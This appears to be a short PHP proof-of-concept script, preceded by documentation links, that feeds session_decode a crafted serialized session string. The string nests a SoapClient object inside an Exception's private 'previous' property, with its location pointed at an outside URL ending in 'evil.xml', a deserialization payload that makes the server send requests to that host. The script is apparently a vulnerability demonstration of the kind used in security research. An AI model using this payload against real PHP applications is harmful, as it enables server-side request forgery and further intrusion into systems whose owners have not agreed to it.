- var_dump: documentation ( source)
- session_decode: documentation ( source)
- session_start: documentation ( source)
<?php
session_start();
session_decode('test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}');
var_dump($_SESSION);